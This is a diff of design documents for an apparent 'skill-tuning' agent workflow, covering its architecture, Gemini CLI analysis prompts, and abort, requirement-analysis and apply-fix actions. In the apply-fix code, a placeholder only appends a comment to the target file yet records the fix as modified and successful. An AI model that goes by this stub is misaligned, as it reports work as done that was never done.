@@ -125,6 +166,22 @@ Generate API documentation from source code.
│ Phase 3: Generation → api-docs.md │
└─────────────────────────────────────────────────────────────────┘
\`\`\`
## ⚠️ Mandatory Prerequisites (强制前置条件)
> **⛔ 禁止跳过**: 在执行任何操作之前,**必须**完整阅读以下文档。
### 规范文档 (必读)
| Document | Purpose | Priority |
|----------|---------|----------|
| [specs/api-standards.md](specs/api-standards.md) | API 文档标准规范 | **P0 - 最高** |
### 模板文件 (生成前必读)
| Document | Purpose |
|----------|---------|
| [templates/endpoint-doc.md](templates/endpoint-doc.md) | 端点文档模板 |
```
## Autonomous 模式示例
@@ -144,6 +201,10 @@ Interactive task management with CRUD operations.
\`\`\`
┌─────────────────────────────────────────────────────────────────┐
│ ⚠️ Phase 0: Specification Study (强制前置) │
└───────────────┬─────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ Orchestrator (状态驱动决策) │
└───────────────┬─────────────────────────────────────────────────┘
@@ -153,4 +214,22 @@ Interactive task management with CRUD operations.
│ List │ │Create │ │ Edit │ │Delete │
└───────┘ └───────┘ └───────┘ └───────┘
\`\`\`
## ⚠️ Mandatory Prerequisites (强制前置条件)
> **⛔ 禁止跳过**: 在执行任何操作之前,**必须**完整阅读以下文档。
### 规范文档 (必读)
| Document | Purpose | Priority |
|----------|---------|----------|
| [specs/task-schema.md](specs/task-schema.md) | 任务数据结构规范 | **P0 - 最高** |
| [specs/action-catalog.md](specs/action-catalog.md) | 动作目录 | P1 |
### 模板文件 (生成前必读)
| Document | Purpose |
|----------|---------|
| [templates/orchestrator-base.md](templates/orchestrator-base.md) | 编排器模板 |
| [templates/action-base.md](templates/action-base.md) | 动作模板 |
```

View File

@@ -0,0 +1,303 @@
---
name: skill-tuning
description: Universal skill diagnosis and optimization tool. Detect and fix skill execution issues including context explosion, long-tail forgetting, data flow disruption, and agent coordination failures. Supports Gemini CLI for deep analysis. Triggers on "skill tuning", "tune skill", "skill diagnosis", "optimize skill", "skill debug".
allowed-tools: Task, AskUserQuestion, Read, Write, Bash, Glob, Grep, mcp__ace-tool__search_context
---
# Skill Tuning
Universal skill diagnosis and optimization tool that identifies and resolves skill execution problems through iterative multi-agent analysis.
## Architecture Overview
```
┌─────────────────────────────────────────────────────────────────────────────┐
│ Skill Tuning Architecture (Autonomous Mode + Gemini CLI) │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ ⚠️ Phase 0: Specification → 阅读规范 + 理解目标 skill 结构 (强制前置) │
│ Study │
│ ↓ │
│ ┌───────────────────────────────────────────────────────────────────────┐ │
│ │ Orchestrator (状态驱动决策) │ │
│ │ 读取诊断状态 → 选择下一步动作 → 执行 → 更新状态 → 循环直到完成 │ │
│ └───────────────────────────────────────────────────────────────────────┘ │
│ │ │
│ ┌────────────┬───────────┼───────────┬────────────┬────────────┐ │
│ ↓ ↓ ↓ ↓ ↓ ↓ │
│ ┌──────┐ ┌──────────┐ ┌─────────┐ ┌────────┐ ┌────────┐ ┌─────────┐ │
│ │ Init │→ │ Analyze │→ │Diagnose │ │Diagnose│ │Diagnose│ │ Gemini │ │
│ │ │ │Requiremts│ │ Context │ │ Memory │ │DataFlow│ │Analysis │ │
│ └──────┘ └──────────┘ └─────────┘ └────────┘ └────────┘ └─────────┘ │
│ │ │ │ │ │ │
│ │ └───────────┴───────────┴────────────┘ │
│ ↓ │
│ ┌───────────────────────────────────────────────────────────────────────┐ │
│ │ Requirement Analysis (NEW) │ │
│ │ • Phase 1: 维度拆解 (Gemini CLI) - 单一描述 → 多个关注维度 │ │
│ │ • Phase 2: Spec 匹配 - 每个维度 → taxonomy + strategy │ │
│ │ • Phase 3: 覆盖度评估 - 以"有修复策略"为满足标准 │ │
│ │ • Phase 4: 歧义检测 - 识别多义性描述,必要时请求澄清 │ │
│ └───────────────────────────────────────────────────────────────────────┘ │
│ ↓ │
│ ┌──────────────────┐ │
│ │ Apply Fixes + │ │
│ │ Verify Results │ │
│ └──────────────────┘ │
│ │
│ ┌───────────────────────────────────────────────────────────────────────┐ │
│ │ Gemini CLI Integration │ │
│ │ 根据用户需求动态调用 gemini cli 进行深度分析: │ │
│ │ • 需求维度拆解 (requirement decomposition) │ │
│ │ • 复杂问题分析 (prompt engineering, architecture review) │ │
│ │ • 代码模式识别 (pattern matching, anti-pattern detection) │ │
│ │ • 修复策略生成 (fix generation, refactoring suggestions) │ │
│ └───────────────────────────────────────────────────────────────────────┘ │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
```
## Problem Domain
Based on comprehensive analysis, skill-tuning addresses **core skill issues** and **general optimization areas**:
### Core Skill Issues (自动检测)
| Priority | Problem | Root Cause | Solution Strategy |
|----------|---------|------------|-------------------|
| **P0** | Authoring Principles Violation | 中间文件存储, State膨胀, 文件中转 | eliminate_intermediate_files, minimize_state, context_passing |
| **P1** | Data Flow Disruption | Scattered state, inconsistent formats | state_centralization, schema_enforcement |
| **P2** | Agent Coordination | Fragile call chains, merge complexity | error_wrapping, result_validation |
| **P3** | Context Explosion | Token accumulation, multi-turn bloat | sliding_window, context_summarization |
| **P4** | Long-tail Forgetting | Early constraint loss | constraint_injection, checkpoint_restore |
| **P5** | Token Consumption | Verbose prompts, excessive state, redundant I/O | prompt_compression, lazy_loading, output_minimization |
### General Optimization Areas (按需分析 via Gemini CLI)
| Category | Issues | Gemini Analysis Scope |
|----------|--------|----------------------|
| **Prompt Engineering** | 模糊指令, 输出格式不一致, 幻觉风险 | 提示词优化, 结构化输出设计 |
| **Architecture** | 阶段划分不合理, 依赖混乱, 扩展性差 | 架构审查, 模块化建议 |
| **Performance** | 执行慢, Token消耗高, 重复计算 | 性能分析, 缓存策略 |
| **Error Handling** | 错误恢复不当, 无降级策略, 日志不足 | 容错设计, 可观测性增强 |
| **Output Quality** | 输出不稳定, 格式漂移, 质量波动 | 质量门控, 验证机制 |
| **User Experience** | 交互不流畅, 反馈不清晰, 进度不可见 | UX优化, 进度追踪 |
## Key Design Principles
1. **Problem-First Diagnosis**: Systematic identification before any fix attempt
2. **Data-Driven Analysis**: Record execution traces, token counts, state snapshots
3. **Iterative Refinement**: Multiple tuning rounds until quality gates pass
4. **Non-Destructive**: All changes are reversible with backup checkpoints
5. **Agent Coordination**: Use specialized sub-agents for each diagnosis type
6. **Gemini CLI On-Demand**: Deep analysis via CLI for complex/custom issues
---
## Gemini CLI Integration
根据用户需求动态调用 Gemini CLI 进行深度分析。
### Trigger Conditions
| Condition | Action | CLI Mode |
|-----------|--------|----------|
| 用户描述复杂问题 | 调用 Gemini 分析问题根因 | `analysis` |
| 自动诊断发现 critical 问题 | 请求深度分析确认 | `analysis` |
| 用户请求架构审查 | 执行架构分析 | `analysis` |
| 需要生成修复代码 | 生成修复提案 | `write` |
| 标准策略不适用 | 请求定制化策略 | `analysis` |
### CLI Command Template
```bash
ccw cli -p "
PURPOSE: ${purpose}
TASK: ${task_steps}
MODE: ${mode}
CONTEXT: @${skill_path}/**/*
EXPECTED: ${expected_output}
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/${mode}-protocol.md) | ${constraints}
" --tool gemini --mode ${mode} --cd ${skill_path}
```
### Analysis Types
#### 1. Problem Root Cause Analysis
```bash
ccw cli -p "
PURPOSE: Identify root cause of skill execution issue: ${user_issue_description}
TASK: • Analyze skill structure and phase flow • Identify anti-patterns • Trace data flow issues
MODE: analysis
CONTEXT: @**/*.md
EXPECTED: JSON with { root_causes: [], patterns_found: [], recommendations: [] }
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Focus on execution flow
" --tool gemini --mode analysis
```
#### 2. Architecture Review
```bash
ccw cli -p "
PURPOSE: Review skill architecture for scalability and maintainability
TASK: • Evaluate phase decomposition • Check state management patterns • Assess agent coordination
MODE: analysis
CONTEXT: @**/*.md
EXPECTED: Architecture assessment with improvement recommendations
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Focus on modularity
" --tool gemini --mode analysis
```
#### 3. Fix Strategy Generation
```bash
ccw cli -p "
PURPOSE: Generate fix strategy for issue: ${issue_id} - ${issue_description}
TASK: • Analyze issue context • Design fix approach • Generate implementation plan
MODE: analysis
CONTEXT: @**/*.md
EXPECTED: JSON with { strategy: string, changes: [], verification_steps: [] }
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Minimal invasive changes
" --tool gemini --mode analysis
```
---
## Mandatory Prerequisites
> **CRITICAL**: Read these documents before executing any action.
### Core Specs (Required)
| Document | Purpose | Priority |
|----------|---------|----------|
| [specs/skill-authoring-principles.md](specs/skill-authoring-principles.md) | **首要准则:简洁高效、去除存储、上下文流转** | **P0** |
| [specs/problem-taxonomy.md](specs/problem-taxonomy.md) | Problem classification and detection patterns | **P0** |
| [specs/tuning-strategies.md](specs/tuning-strategies.md) | Fix strategies for each problem type | **P0** |
| [specs/dimension-mapping.md](specs/dimension-mapping.md) | Dimension to Spec mapping rules | **P0** |
| [specs/quality-gates.md](specs/quality-gates.md) | Quality thresholds and verification criteria | P1 |
### Templates (Reference)
| Document | Purpose |
|----------|---------|
| [templates/diagnosis-report.md](templates/diagnosis-report.md) | Diagnosis report structure |
| [templates/fix-proposal.md](templates/fix-proposal.md) | Fix proposal format |
---
## Execution Flow
```
┌─────────────────────────────────────────────────────────────────────────────┐
│ Phase 0: Specification Study (强制前置 - 禁止跳过) │
│ → Read: specs/problem-taxonomy.md (问题分类) │
│ → Read: specs/tuning-strategies.md (调优策略) │
│ → Read: specs/dimension-mapping.md (维度映射规则) │
│ → Read: Target skill's SKILL.md and phases/*.md │
│ → Output: 内化规范,理解目标 skill 结构 │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-init: Initialize Tuning Session │
│ → Create work directory: .workflow/.scratchpad/skill-tuning-{timestamp} │
│ → Initialize state.json with target skill info │
│ → Create backup of target skill files │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-analyze-requirements: Requirement Analysis │
│ → Phase 1: 维度拆解 (Gemini CLI) - 单一描述 → 多个关注维度 │
│ → Phase 2: Spec 匹配 - 每个维度 → taxonomy + strategy │
│ → Phase 3: 覆盖度评估 - 以"有修复策略"为满足标准 │
│ → Phase 4: 歧义检测 - 识别多义性描述,必要时请求澄清 │
│ → Output: state.json (requirement_analysis field) │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-diagnose-*: Diagnosis Actions (context/memory/dataflow/agent/docs/ │
│ token_consumption) │
│ → Execute pattern-based detection for each category │
│ → Output: state.json (diagnosis.{category} field) │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-generate-report: Consolidated Report │
│ → Generate markdown summary from state.diagnosis │
│ → Prioritize issues by severity │
│ → Output: state.json (final_report field) │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-propose-fixes: Fix Proposal Generation │
│ → Generate fix strategies for each issue │
│ → Create implementation plan │
│ → Output: state.json (proposed_fixes field) │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-apply-fix: Apply Selected Fix │
│ → User selects fix to apply │
│ → Execute fix with backup │
│ → Update state with fix result │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-verify: Verification │
│ → Re-run affected diagnosis │
│ → Check quality gates │
│ → Update iteration count │
├─────────────────────────────────────────────────────────────────────────────┤
│ action-complete: Finalization │
│ → Set status='completed' │
│ → Final report already in state.json (final_report field) │
│ → Output: state.json (final) │
└─────────────────────────────────────────────────────────────────────────────┘
```
## Directory Setup
```javascript
const timestamp = new Date().toISOString().slice(0,19).replace(/[-:T]/g, '');
const workDir = `.workflow/.scratchpad/skill-tuning-${timestamp}`;
// Simplified: Only backups dir needed, diagnosis results go into state.json
Bash(`mkdir -p "${workDir}/backups"`);
```
## Output Structure
```
.workflow/.scratchpad/skill-tuning-{timestamp}/
├── state.json # Single source of truth (all results consolidated)
│ ├── diagnosis.* # All diagnosis results embedded
│ ├── issues[] # Found issues
│ ├── proposed_fixes[] # Fix proposals
│ └── final_report # Markdown summary (on completion)
└── backups/
└── {skill-name}-backup/ # Original skill files backup
```
> **Token Optimization**: All outputs consolidated into state.json. No separate diagnosis files or report files.
## State Schema
详细状态结构定义请参阅 [phases/state-schema.md](phases/state-schema.md)。
核心状态字段:
- `status`: 工作流状态 (pending/running/completed/failed)
- `target_skill`: 目标 skill 信息
- `diagnosis`: 各维度诊断结果
- `issues`: 发现的问题列表
- `proposed_fixes`: 建议的修复方案
## Reference Documents
| Document | Purpose |
|----------|---------|
| [phases/orchestrator.md](phases/orchestrator.md) | Orchestrator decision logic |
| [phases/state-schema.md](phases/state-schema.md) | State structure definition |
| [phases/actions/action-init.md](phases/actions/action-init.md) | Initialize tuning session |
| [phases/actions/action-analyze-requirements.md](phases/actions/action-analyze-requirements.md) | Requirement analysis (NEW) |
| [phases/actions/action-diagnose-context.md](phases/actions/action-diagnose-context.md) | Context explosion diagnosis |
| [phases/actions/action-diagnose-memory.md](phases/actions/action-diagnose-memory.md) | Long-tail forgetting diagnosis |
| [phases/actions/action-diagnose-dataflow.md](phases/actions/action-diagnose-dataflow.md) | Data flow diagnosis |
| [phases/actions/action-diagnose-agent.md](phases/actions/action-diagnose-agent.md) | Agent coordination diagnosis |
| [phases/actions/action-diagnose-docs.md](phases/actions/action-diagnose-docs.md) | Documentation structure diagnosis |
| [phases/actions/action-diagnose-token-consumption.md](phases/actions/action-diagnose-token-consumption.md) | Token consumption diagnosis |
| [phases/actions/action-generate-report.md](phases/actions/action-generate-report.md) | Report generation |
| [phases/actions/action-propose-fixes.md](phases/actions/action-propose-fixes.md) | Fix proposal |
| [phases/actions/action-apply-fix.md](phases/actions/action-apply-fix.md) | Fix application |
| [phases/actions/action-verify.md](phases/actions/action-verify.md) | Verification |
| [phases/actions/action-complete.md](phases/actions/action-complete.md) | Finalization |
| [specs/problem-taxonomy.md](specs/problem-taxonomy.md) | Problem classification |
| [specs/tuning-strategies.md](specs/tuning-strategies.md) | Fix strategies |
| [specs/dimension-mapping.md](specs/dimension-mapping.md) | Dimension to Spec mapping (NEW) |
| [specs/quality-gates.md](specs/quality-gates.md) | Quality criteria |

View File

@@ -0,0 +1,164 @@
# Action: Abort
Abort the tuning session due to unrecoverable errors.
## Purpose
- Safely terminate on critical failures
- Preserve diagnostic information for debugging
- Ensure backup remains available
- Notify user of failure reason
## Preconditions
- [ ] state.error_count >= state.max_errors
- [ ] OR critical failure detected
## Execution
```javascript
async function execute(state, workDir) {
console.log('Aborting skill tuning session...');
const errors = state.errors;
const targetSkill = state.target_skill;
// Generate abort report
const abortReport = `# Skill Tuning Aborted
**Target Skill**: ${targetSkill?.name || 'Unknown'}
**Aborted At**: ${new Date().toISOString()}
**Reason**: Too many errors or critical failure
---
## Error Log
${errors.length === 0 ? '_No errors recorded_' :
errors.map((err, i) => `
### Error ${i + 1}
- **Action**: ${err.action}
- **Message**: ${err.message}
- **Time**: ${err.timestamp}
- **Recoverable**: ${err.recoverable ? 'Yes' : 'No'}
`).join('\n')}
---
## Session State at Abort
- **Status**: ${state.status}
- **Iteration Count**: ${state.iteration_count}
- **Completed Actions**: ${state.completed_actions.length}
- **Issues Found**: ${state.issues.length}
- **Fixes Applied**: ${state.applied_fixes.length}
---
## Recovery Options
### Option 1: Restore Original Skill
If any changes were made, restore from backup:
\`\`\`bash
cp -r "${state.backup_dir}/${targetSkill?.name || 'backup'}-backup"/* "${targetSkill?.path || 'target'}/"
\`\`\`
### Option 2: Resume from Last State
The session state is preserved at:
\`${workDir}/state.json\`
To resume:
1. Fix the underlying issue
2. Reset error_count in state.json
3. Re-run skill-tuning with --resume flag
### Option 3: Manual Investigation
Review the following files:
- Diagnosis results: \`${workDir}/diagnosis/*.json\`
- Error log: \`${workDir}/errors.json\`
- State snapshot: \`${workDir}/state.json\`
---
## Diagnostic Information
### Last Successful Action
${state.completed_actions.length > 0 ? state.completed_actions[state.completed_actions.length - 1] : 'None'}
### Current Action When Failed
${state.current_action || 'Unknown'}
### Partial Diagnosis Results
- Context: ${state.diagnosis.context ? 'Completed' : 'Not completed'}
- Memory: ${state.diagnosis.memory ? 'Completed' : 'Not completed'}
- Data Flow: ${state.diagnosis.dataflow ? 'Completed' : 'Not completed'}
- Agent: ${state.diagnosis.agent ? 'Completed' : 'Not completed'}
---
*Skill tuning aborted - please review errors and retry*
`;
// Write abort report
Write(`${workDir}/abort-report.md`, abortReport);
// Save error log
Write(`${workDir}/errors.json`, JSON.stringify(errors, null, 2));
// Notify user
await AskUserQuestion({
questions: [{
question: `Skill tuning aborted due to ${errors.length} errors. Would you like to restore the original skill?`,
header: 'Restore',
multiSelect: false,
options: [
{ label: 'Yes, restore', description: 'Restore original skill from backup' },
{ label: 'No, keep changes', description: 'Keep any partial changes made' }
]
}]
}).then(async response => {
if (response['Restore'] === 'Yes, restore') {
// Restore from backup
if (state.backup_dir && targetSkill?.path) {
Bash(`cp -r "${state.backup_dir}/${targetSkill.name}-backup"/* "${targetSkill.path}/"`);
console.log('Original skill restored from backup.');
}
}
}).catch(() => {
// User cancelled, don't restore
});
return {
stateUpdates: {
status: 'failed',
completed_at: new Date().toISOString()
},
outputFiles: [`${workDir}/abort-report.md`, `${workDir}/errors.json`],
summary: `Tuning aborted: ${errors.length} errors. Check abort-report.md for details.`
};
}
```
## State Updates
```javascript
return {
stateUpdates: {
status: 'failed',
completed_at: '<timestamp>'
}
};
```
## Output
- **File**: `abort-report.md`
- **Location**: `${workDir}/abort-report.md`
## Error Handling
This action should not fail - it's the final error handler.
## Next Actions
- None (terminal state)

View File

@@ -0,0 +1,406 @@
# Action: Analyze Requirements
将用户问题描述拆解为多个分析维度,匹配 Spec评估覆盖度检测歧义。
## Purpose
- 将单一用户描述拆解为多个独立关注维度
- 为每个维度匹配 problem-taxonomy检测+ tuning-strategies修复
- 以"有修复策略"为标准判断是否满足需求
- 检测歧义并在必要时请求用户澄清
## Preconditions
- [ ] `state.status === 'running'`
- [ ] `state.target_skill !== null`
- [ ] `state.completed_actions.includes('action-init')`
- [ ] `!state.completed_actions.includes('action-analyze-requirements')`
## Execution
### Phase 1: 维度拆解 (Gemini CLI)
调用 Gemini 对用户描述进行语义分析,拆解为独立维度:
```javascript
async function analyzeDimensions(state, workDir) {
const prompt = `
PURPOSE: 分析用户问题描述,拆解为独立的关注维度
TASK:
• 识别用户描述中的多个关注点(每个关注点应该是独立的、可单独分析的)
• 为每个关注点提取关键词(中英文均可)
• 推断可能的问题类别:
- context_explosion: 上下文/Token 相关
- memory_loss: 遗忘/约束丢失相关
- dataflow_break: 状态/数据流相关
- agent_failure: Agent/子任务相关
- prompt_quality: 提示词/输出质量相关
- architecture: 架构/结构相关
- performance: 性能/效率相关
- error_handling: 错误/异常处理相关
- output_quality: 输出质量/验证相关
- user_experience: 交互/体验相关
• 评估推断置信度 (0-1)
INPUT:
User description: ${state.user_issue_description}
Target skill: ${state.target_skill.name}
Skill structure: ${JSON.stringify(state.target_skill.phases)}
MODE: analysis
CONTEXT: @specs/problem-taxonomy.md @specs/dimension-mapping.md
EXPECTED: JSON (不要包含 markdown 代码块标记)
{
"dimensions": [
{
"id": "DIM-001",
"description": "关注点的简短描述",
"keywords": ["关键词1", "关键词2"],
"inferred_category": "问题类别",
"confidence": 0.85,
"reasoning": "推断理由"
}
],
"analysis_notes": "整体分析说明"
}
RULES:
- 每个维度必须独立,不重叠
- 低于 0.5 置信度的推断应标注需要澄清
- 如果用户描述非常模糊,至少提取一个 "general" 维度
`;
const cliCommand = `ccw cli -p "${escapeForShell(prompt)}" --tool gemini --mode analysis --cd "${state.target_skill.path}"`;
console.log('Phase 1: 执行 Gemini 维度拆解分析...');
const result = Bash({
command: cliCommand,
run_in_background: true,
timeout: 300000
});
return result;
}
```
### Phase 2: Spec 匹配
基于 `specs/category-mappings.json` 配置为每个维度匹配检测模式和修复策略:
```javascript
// 加载集中式映射配置
const mappings = JSON.parse(Read('specs/category-mappings.json'));
function matchSpecs(dimensions) {
return dimensions.map(dim => {
// 匹配 taxonomy pattern
const taxonomyMatch = findTaxonomyMatch(dim.inferred_category);
// 匹配 strategy
const strategyMatch = findStrategyMatch(dim.inferred_category);
// 判断是否满足(核心标准:有修复策略)
const hasFix = strategyMatch !== null && strategyMatch.strategies.length > 0;
return {
dimension_id: dim.id,
taxonomy_match: taxonomyMatch,
strategy_match: strategyMatch,
has_fix: hasFix,
needs_gemini_analysis: taxonomyMatch === null || mappings.categories[dim.inferred_category]?.needs_gemini_analysis
};
});
}
function findTaxonomyMatch(category) {
const config = mappings.categories[category];
if (!config || config.pattern_ids.length === 0) return null;
return {
category: category,
pattern_ids: config.pattern_ids,
severity_hint: config.severity_hint
};
}
function findStrategyMatch(category) {
const config = mappings.categories[category];
if (!config) {
// Fallback to custom from config
return mappings.fallback;
}
return {
strategies: config.strategies,
risk_levels: config.risk_levels
};
}
```
### Phase 3: 覆盖度评估
评估所有维度的 Spec 覆盖情况:
```javascript
function evaluateCoverage(specMatches) {
const total = specMatches.length;
const withDetection = specMatches.filter(m => m.taxonomy_match !== null).length;
const withFix = specMatches.filter(m => m.has_fix).length;
const rate = total > 0 ? Math.round((withFix / total) * 100) : 0;
let status;
if (rate >= 80) {
status = 'satisfied';
} else if (rate >= 50) {
status = 'partial';
} else {
status = 'unsatisfied';
}
return {
total_dimensions: total,
with_detection: withDetection,
with_fix_strategy: withFix,
coverage_rate: rate,
status: status
};
}
```
### Phase 4: 歧义检测
识别需要用户澄清的歧义点:
```javascript
function detectAmbiguities(dimensions, specMatches) {
const ambiguities = [];
for (const dim of dimensions) {
const match = specMatches.find(m => m.dimension_id === dim.id);
// 检测1: 低置信度 (< 0.5)
if (dim.confidence < 0.5) {
ambiguities.push({
dimension_id: dim.id,
type: 'vague_description',
description: `维度 "${dim.description}" 描述模糊,推断置信度低 (${dim.confidence})`,
possible_interpretations: suggestInterpretations(dim),
needs_clarification: true
});
}
// 检测2: 无匹配类别
if (!match || (!match.taxonomy_match && !match.strategy_match)) {
ambiguities.push({
dimension_id: dim.id,
type: 'no_category_match',
description: `维度 "${dim.description}" 无法匹配到已知问题类别`,
possible_interpretations: ['custom'],
needs_clarification: true
});
}
// 检测3: 关键词冲突(可能属于多个类别)
if (dim.keywords.length > 3 && hasConflictingKeywords(dim.keywords)) {
ambiguities.push({
dimension_id: dim.id,
type: 'conflicting_keywords',
description: `维度 "${dim.description}" 的关键词可能指向多个不同问题`,
possible_interpretations: inferMultipleCategories(dim.keywords),
needs_clarification: true
});
}
}
return ambiguities;
}
function suggestInterpretations(dim) {
// 基于 mappings 配置推荐可能的解释
const categories = Object.keys(mappings.categories).filter(
cat => cat !== 'authoring_principles_violation' // 排除内部检测类别
);
return categories.slice(0, 4); // 返回最常见的 4 个作为选项
}
function hasConflictingKeywords(keywords) {
// 检查关键词是否指向不同方向
const categoryHints = keywords.map(k => getKeywordCategoryHint(k));
const uniqueCategories = [...new Set(categoryHints.filter(c => c))];
return uniqueCategories.length > 1;
}
function getKeywordCategoryHint(keyword) {
// 从 mappings.keywords 构建查找表(合并中英文关键词)
const keywordMap = {
...mappings.keywords.chinese,
...mappings.keywords.english
};
return keywordMap[keyword.toLowerCase()];
}
```
## User Interaction
如果检测到需要澄清的歧义,暂停并询问用户:
```javascript
async function handleAmbiguities(ambiguities, dimensions) {
const needsClarification = ambiguities.filter(a => a.needs_clarification);
if (needsClarification.length === 0) {
return null; // 无需澄清
}
const questions = needsClarification.slice(0, 4).map(a => {
const dim = dimensions.find(d => d.id === a.dimension_id);
return {
question: `关于 "${dim.description}",您具体指的是?`,
header: a.dimension_id,
options: a.possible_interpretations.map(interp => ({
label: getCategoryLabel(interp),
description: getCategoryDescription(interp)
})),
multiSelect: false
};
});
return await AskUserQuestion({ questions });
}
function getCategoryLabel(category) {
// 从 mappings 配置加载标签
return mappings.category_labels_chinese[category] || category;
}
function getCategoryDescription(category) {
// 从 mappings 配置加载描述
return mappings.category_descriptions[category] || 'Requires further analysis';
}
```
## Output
### State Updates
```javascript
return {
stateUpdates: {
requirement_analysis: {
status: ambiguities.some(a => a.needs_clarification) ? 'needs_clarification' : 'completed',
analyzed_at: new Date().toISOString(),
dimensions: dimensions,
spec_matches: specMatches,
coverage: coverageResult,
ambiguities: ambiguities
},
// 根据分析结果自动优化 focus_areas
focus_areas: deriveOptimalFocusAreas(specMatches)
},
outputFiles: [
`${workDir}/requirement-analysis.json`,
`${workDir}/requirement-analysis.md`
],
summary: generateSummary(dimensions, coverageResult, ambiguities)
};
function deriveOptimalFocusAreas(specMatches) {
const coreCategories = ['context', 'memory', 'dataflow', 'agent'];
const matched = specMatches
.filter(m => m.taxonomy_match !== null)
.map(m => {
// 映射到诊断 focus_area
const category = m.taxonomy_match.category;
if (category === 'context_explosion' || category === 'performance') return 'context';
if (category === 'memory_loss') return 'memory';
if (category === 'dataflow_break') return 'dataflow';
if (category === 'agent_failure' || category === 'error_handling') return 'agent';
return null;
})
.filter(f => f && coreCategories.includes(f));
// 去重
return [...new Set(matched)];
}
function generateSummary(dimensions, coverage, ambiguities) {
const dimCount = dimensions.length;
const coverageStatus = coverage.status;
const ambiguityCount = ambiguities.filter(a => a.needs_clarification).length;
let summary = `分析完成:${dimCount} 个维度`;
summary += `,覆盖度 ${coverage.coverage_rate}% (${coverageStatus})`;
if (ambiguityCount > 0) {
summary += `${ambiguityCount} 个歧义点待澄清`;
}
return summary;
}
```
### Output Files
#### requirement-analysis.json
```json
{
"timestamp": "2024-01-01T00:00:00Z",
"target_skill": "skill-name",
"user_description": "原始用户描述",
"dimensions": [...],
"spec_matches": [...],
"coverage": {...},
"ambiguities": [...],
"derived_focus_areas": [...]
}
```
#### requirement-analysis.md
```markdown
# 需求分析报告
## 用户描述
> ${user_issue_description}
## 维度拆解
| ID | 描述 | 类别 | 置信度 |
|----|------|------|--------|
| DIM-001 | ... | ... | 0.85 |
## Spec 匹配
| 维度 | 检测模式 | 修复策略 | 是否满足 |
|------|----------|----------|----------|
| DIM-001 | CTX-001,002 | sliding_window | ✓ |
## 覆盖度评估
- 总维度数: N
- 有检测手段: M
- 有修复策略: K (满足标准)
- 覆盖率: X%
- 状态: satisfied/partial/unsatisfied
## 歧义点
(如有)
```
## Error Handling
| Error | Recovery |
|-------|----------|
| Gemini CLI 超时 | 重试一次,仍失败则使用简化分析 |
| JSON 解析失败 | 尝试修复 JSON 或使用默认维度 |
| 无法匹配任何类别 | 全部归类为 custom触发 Gemini 深度分析 |
## Next Actions
- 如果 `requirement_analysis.status === 'completed'`: 继续到 `action-diagnose-*`
- 如果 `requirement_analysis.status === 'needs_clarification'`: 等待用户澄清后重新执行
- 如果 `coverage.status === 'unsatisfied'`: 自动触发 `action-gemini-analysis` 进行深度分析

View File

@@ -0,0 +1,206 @@
# Action: Apply Fix
Apply a selected fix to the target skill with backup and rollback capability.
## Purpose
- Apply fix changes to target skill files
- Create backup before modifications
- Track applied fixes for verification
- Support rollback if needed
## Preconditions
- [ ] state.status === 'running'
- [ ] state.pending_fixes.length > 0
- [ ] state.proposed_fixes contains the fix to apply
## Execution
```javascript
async function execute(state, workDir) {
const pendingFixes = state.pending_fixes;
const proposedFixes = state.proposed_fixes;
const targetPath = state.target_skill.path;
const backupDir = state.backup_dir;
if (pendingFixes.length === 0) {
return {
stateUpdates: {},
outputFiles: [],
summary: 'No pending fixes to apply'
};
}
// Get next fix to apply
const fixId = pendingFixes[0];
const fix = proposedFixes.find(f => f.id === fixId);
if (!fix) {
return {
stateUpdates: {
pending_fixes: pendingFixes.slice(1),
errors: [...state.errors, {
action: 'action-apply-fix',
message: `Fix ${fixId} not found in proposals`,
timestamp: new Date().toISOString(),
recoverable: true
}]
},
outputFiles: [],
summary: `Fix ${fixId} not found, skipping`
};
}
console.log(`Applying fix ${fix.id}: ${fix.description}`);
// Create fix-specific backup
const fixBackupDir = `${backupDir}/before-${fix.id}`;
Bash(`mkdir -p "${fixBackupDir}"`);
const appliedChanges = [];
let success = true;
for (const change of fix.changes) {
try {
// Resolve file path (handle wildcards)
let targetFiles = [];
if (change.file.includes('*')) {
targetFiles = Glob(`${targetPath}/${change.file}`);
} else {
targetFiles = [`${targetPath}/${change.file}`];
}
for (const targetFile of targetFiles) {
// Backup original
const relativePath = targetFile.replace(targetPath + '/', '');
const backupPath = `${fixBackupDir}/${relativePath}`;
if (Glob(targetFile).length > 0) {
const originalContent = Read(targetFile);
Bash(`mkdir -p "$(dirname "${backupPath}")"`);
Write(backupPath, originalContent);
}
// Apply change based on action type
if (change.action === 'modify' && change.diff) {
// For now, append the diff as a comment/note
// Real implementation would parse and apply the diff
const existingContent = Read(targetFile);
// Simple diff application: look for context and apply
// This is a simplified version - real implementation would be more sophisticated
const newContent = existingContent + `\n\n<!-- Applied fix ${fix.id}: ${fix.description} -->\n`;
Write(targetFile, newContent);
appliedChanges.push({
file: relativePath,
action: 'modified',
backup: backupPath
});
} else if (change.action === 'create') {
Write(targetFile, change.new_content || '');
appliedChanges.push({
file: relativePath,
action: 'created',
backup: null
});
}
}
} catch (error) {
console.log(`Error applying change to ${change.file}: ${error.message}`);
success = false;
}
}
// Record applied fix
const appliedFix = {
fix_id: fix.id,
applied_at: new Date().toISOString(),
success: success,
backup_path: fixBackupDir,
verification_result: 'pending',
rollback_available: true,
changes_made: appliedChanges
};
// Update applied fixes log
const appliedFixesPath = `${workDir}/fixes/applied-fixes.json`;
let existingApplied = [];
try {
existingApplied = JSON.parse(Read(appliedFixesPath));
} catch (e) {
existingApplied = [];
}
existingApplied.push(appliedFix);
Write(appliedFixesPath, JSON.stringify(existingApplied, null, 2));
return {
stateUpdates: {
applied_fixes: [...state.applied_fixes, appliedFix],
pending_fixes: pendingFixes.slice(1) // Remove applied fix from pending
},
